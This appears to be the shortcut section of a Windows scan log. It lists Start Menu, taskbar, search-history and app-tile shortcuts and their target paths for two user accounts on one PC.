Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan\Release info.lnk -> C:\Program Files (x86)\SpeedFan\speedfan.txt ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan\SpeedFan.lnk -> C:\Program Files (x86)\SpeedFan\speedfan.exe (Almico Software (almico.com))
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan\Uninstall SpeedFan.lnk -> C:\Program Files (x86)\SpeedFan\uninstall.exe ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\MSI Afterburner On-Screen Display Server.lnk -> C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTSS.exe ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\MSI Afterburner.lnk -> C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\ReadMe.lnk -> C:\Program Files (x86)\MSI Afterburner\Doc\ReadMe.pdf ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\Uninstall.lnk -> C:\Program Files (x86)\MSI Afterburner\Uninstall.exe ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\SDK\MSI Afterburner localization reference.lnk -> C:\Program Files (x86)\MSI Afterburner\SDK\Doc\Localization reference.pdf ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\SDK\MSI Afterburner skin format reference.lnk -> C:\Program Files (x86)\MSI Afterburner\SDK\Doc\USF skin format reference.pdf ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\SDK\Samples.lnk -> C:\Program Files (x86)\MSI Afterburner\SDK\Samples ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView\About IrfanView.lnk -> C:\Program Files (x86)\IrfanView\i_about.txt ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView\Available Languages.lnk -> C:\Program Files (x86)\IrfanView\i_languages.txt ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView\Available PlugIns.lnk -> C:\Program Files (x86)\IrfanView\i_plugins.txt ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView\Command line Options.lnk -> C:\Program Files (x86)\IrfanView\i_options.txt ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView\IrfanView 4.38.lnk -> C:\Program Files (x86)\IrfanView\i_view32.exe (Irfan Skiljan)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView\IrfanView Help.lnk -> C:\Program Files (x86)\IrfanView\i_view32.chm ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView\What's New.lnk -> C:\Program Files (x86)\IrfanView\i_changes.txt ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Charity Engine\Charity Engine.lnk -> C:\Program Files (x86)\BOINC\charityengine.exe (Charity Engine)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AION\AION.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\SendTo\Dropbox.lnk -> C:\Users\Adam\Dropbox ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\AION.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\EaseUS Partition Master 10.2.lnk -> C:\Program Files (x86)\EaseUS\EaseUS Partition Master 10.2\bin\EPMStartLoader.exe ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Komunikator Tlen.pl.lnk -> F:\Tlen7\tlen7.exe ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Oracle VM VirtualBox.lnk -> C:\Program Files\Oracle\VirtualBox\VirtualBox.exe (Oracle Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\PhotoScape.lnk -> C:\Program Files (x86)\PhotoScape\PhotoScape.exe ()
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Picasa 3.lnk -> C:\Program Files (x86)\Google\Picasa3\Picasa3.exe (Google Inc.)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Winamp.lnk -> F:\Winamp\winamp.exe (Nullsoft, Inc.)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AVG PC TuneUp - Start Center.lnk -> C:\Program Files (x86)\AVG\AVG PC TuneUp\Integrator.exe (AVG Technologies)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\GG.lnk -> C:\Users\Adam\AppData\Local\GG\Application\ggapp.exe (GG Network S.A.)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\GIMP 2.lnk -> C:\Program Files\GIMP 2\bin\gimp-2.8.exe (Spencer Kimball, Peter Mattis and the GIMP Development Team)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\IrfanView 4.38.lnk -> C:\Program Files (x86)\IrfanView\i_view32.exe (Irfan Skiljan)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox (2).lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\openfm.lnk -> C:\Users\Adam\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Adam\AppData\Local\OpenFM\Application\openfm.lnk -> C:\Users\Adam\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1475727260_pl.lnk -> [LFv91SPSOh+'gimp11SPSxgHyoLMSYC]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1837593447_pl.lnk -> [LF~A1SPSOh+'%ccleaner11SPSxgHyoLMSYC]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1989434135_pl.lnk -> [LFaU1SPSOh+'9java control panel]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_3144284547_pl.lnk -> [LF~=1SPSOh+'!crimson51SPSxgHyoLMSYC{"sizethreshold":0,"web":[{"CONST":-6.1140871313718}],"apps":[{"CONST":1.42121474935547}],"documents":[{"CONST":-5.48390370128799}],"settings":[{"CONST":-5.34844511457028}],"music":[{"CONST":-5.48390370128799}],"photosandvideos":[{"CONST":-5.48390370128799}]}]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_355714931_pl.lnk -> [LFI1SPSOh+'-procol harum11SPSxgHyoLMSYC{"sizethreshold":0,"web":[{"CONST":-5.48681018081487}],"apps":[{"CONST":1.49946432419198}],"documents":[{"CONST":-6.6318685075024}],"settings":[{"CONST":-5.33191556270866}],"music":[{"CONST":-6.6318685075024}],"photosandvideos":[{"CONST":-6.6318685075024}]}]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_3838445080_pl.lnk -> [LFI=1SPSOh+'!gimp 2]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_3978598652_pl.lnk -> [LFI1SPSOh+'-symphonicrock11SPSxgHyoLMSYC]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_4132176080_pl.lnk -> [LF=1SPSOh+'!driver91SPSxgHyoLMSYC{"sizethreshold":0,"web":[{"CONST":-5.80050102830549}],"apps":[{"CONST":1.29650755299096}],"documents":[{"CONST":-5.97667220473481}],"settings":[{"CONST":-5.37955505123109}],"music":[{"CONST":-5.97667220473481}],"photosandvideos":[{"CONST":-5.97667220473481}]}]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_4195869011_pl.lnk -> [LFv91SPSOh+'adyt311SPSxgHyoLMSYC]
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Redefine.ipla_wezn46m95z9ge\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.ZuneVideo_8wekyb3d8bbwe\Microsoft.ZuneVideo.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.ZuneMusic_8wekyb3d8bbwe\Microsoft.ZuneMusic.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.XboxLIVEGames_8wekyb3d8bbwe\Microsoft.XboxLIVEGames.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsScan_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsReadingList_8wekyb3d8bbwe\Microsoft.WindowsReadingList.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk -> [LFz1SPSU(Ly9K-u2microsoft.windowscommunicationsapps_8wekyb3d8bbweGmicrosoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweQmicrosoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.CalendardC:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe1SPSMÔ†i<D*TQ ModernCalendar\CalendarLogo.pngU!ModernCalendar\CalendarBadge.png]%ModernCalendar\CalendarSmallLogo.pngY$ModernCalendar\CalendarWideLogo.pngQ3]%ModernCalendar\CalendarLargeLogo.pngMms-resource:calendarAppTitleY$ModernCalendar\CalendarTinyLogo.pngi1SPS0%G`Mms-resource:calendarAppTitle-1SPSwlE[([8×°Y1SPSOYMGm=Microsoft Corporation] (Brak pliku)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk -> [LF1SPSU(Ly9K-u2microsoft.windowscommunicationsapps_8wekyb3d8bbweGmicrosoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweMmicrosoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.MaildC:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwev1SPSMÔ†i<D*TIModernMail\Res\MailLogo.pngMModernMail\Res\MailBadge.pngU!ModernMail\Res\MailSmallLogo.pngQ ModernMail\Res\MailWideLogo.pngrU!ModernMail\Res\MailLargeLogo.pngEms-resource:mailAppTitleQ ModernMail\Res\MailTinyLogo.pnga1SPS0%G`Ems-resource:mailAppTitleq1SPS}@H1U!ms-resource:mailShareDescription-1SPSwlE[([8×°Y1SPSOYMGm=Microsoft Corporation] (Brak pliku)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk -> [LFr1SPSU(Ly9K-u2microsoft.windowscommunicationsapps_8wekyb3d8bbweGmicrosoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweOmicrosoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.PeopledC:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe1SPSMÔ†i<D*TAModernPeople\People.pngMModernPeople\PeopleSmall.pngIModernPeople\PeopleWide.pngG&MModernPeople\PeopleLarge.png]%ms-resource:///strings/peopleAppNameIModernPeople\PeopleTiny.pngy1SPS0%G`]%ms-resource:///strings/peopleAppName1SPS}@H1e*ms-resource:///strings/raShareDescription-1SPSwlE[([8×°Y1SPSOYMGm=Microsoft Corporation] (Brak pliku)
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsCalculator_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsAlarms_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.SkypeApp_kzf8qxf38zg5c\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Reader_8wekyb3d8bbwe\Microsoft.Reader.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.HelpAndTips_8wekyb3d8bbwe\HelpAndTips.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingWeather_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingTravel_8wekyb3d8bbwe\AppexTravel.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingSports_8wekyb3d8bbwe\AppexSports.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingNews_8wekyb3d8bbwe\AppexNews.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingMaps_8wekyb3d8bbwe\AppexMaps.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingHealthAndFitness_8wekyb3d8bbwe\AppexHealthAndFitness.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingFoodAndDrink_8wekyb3d8bbwe\AppexFoodAndDrink.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.BingFinance_8wekyb3d8bbwe\AppexFinance.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\Facebook.Facebook_8xx8rvfyw5nnt\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\AgoraSA.Sport.plLIVE_vtwfem4w39p0p\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\Microsoft\Windows\Application Shortcuts\6298F5A8.GG_nmmbtdjpca5da\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Adam\AppData\Local\GG\Application\gg.lnk -> C:\Users\Adam\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Administrator\Links\Desktop.lnk -> C:\Users\Administrator\Desktop ()
Shortcut: C:\Users\Administrator\Links\Downloads.lnk -> C:\Users\Administrator\Downloads ()
Shortcut: C:\Users\Administrator\Links\RecentPlaces.lnk -> [::{22877A6D-37A1-461A-91B0-DBDA5AAEBC99}]
Shortcut: C:\Users\Administrator\Desktop\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk -> C:\Users\Administrator\Documents ()
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk -> C:\Users\Administrator\Pictures ()
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Help.lnk -> C:\Windows\HelpPane.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Windows.Defender.lnk -> C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.ZuneVideo_8wekyb3d8bbwe\Microsoft.ZuneVideo.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.ZuneMusic_8wekyb3d8bbwe\Microsoft.ZuneMusic.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.XboxLIVEGames_8wekyb3d8bbwe\Microsoft.XboxLIVEGames.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsScan_8wekyb3d8bbwe\App.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.WindowsReadingList_8wekyb3d8bbwe\Microsoft.WindowsReadingList.lnk -> Tile and icon assets
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk -> [LFz1SPSU(Ly9K-u2microsoft.windowscommunicationsapps_8wekyb3d8bbweGmicrosoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweQmicrosoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.CalendardC:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe1SPSMÔ†i<D*TQ ModernCalendar\CalendarLogo.pngU!ModernCalendar\CalendarBadge.png]%ModernCalendar\CalendarSmallLogo.pngY$ModernCalendar\CalendarWideLogo.pngQ3]%ModernCalendar\CalendarLargeLogo.pngMms-resource:calendarAppTitleY$ModernCalendar\CalendarTinyLogo.pngi1SPS0%G`Mms-resource:calendarAppTitle-1SPSwlE[([8×°Y1SPSOYMGm=Microsoft Corporation] (Brak pliku)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk -> [LF1SPSU(Ly9K-u2microsoft.windowscommunicationsapps_8wekyb3d8bbweGmicrosoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweMmicrosoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.MaildC:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwev1SPSMÔ†i<D*TIModernMail\Res\MailLogo.pngMModernMail\Res\MailBadge.pngU!ModernMail\Res\MailSmallLogo.pngQ ModernMail\Res\MailWideLogo.pngrU!ModernMail\Res\MailLargeLogo.pngEms-resource:mailAppTitleQ ModernMail\Res\MailTinyLogo.pnga1SPS0%G`Ems-resource:mailAppTitleq1SPS}@H1U!ms-resource:mailShareDescription-1SPSwlE[([8×°Y1SPSOYMGm=Microsoft Corporation] (Brak pliku)
Shortcut: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk -> [LFr1SPSU(Ly9K-u2microsoft.windowscommunicationsapps_8wekyb3d8bbweGmicrosoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweOmicrosoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.PeopledC:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe1SPSMÔ†i<D*TAModernPeople\People.pngMModernPeople\PeopleSmall.pngIModernPeople\PeopleWide.pngG&MModernPeople\PeopleLarge.png]%ms-resource:///strings/peopleAppNameIModernPeople\PeopleTiny.pngy1SPS0%G`]%ms-resource:///strings/peopleAppName1SPS}@H1e*ms-resource:///strings/raShareDescription-1SPSwlE[([8×°Y1SPSOYMGm=Microsoft Corporation] (Brak 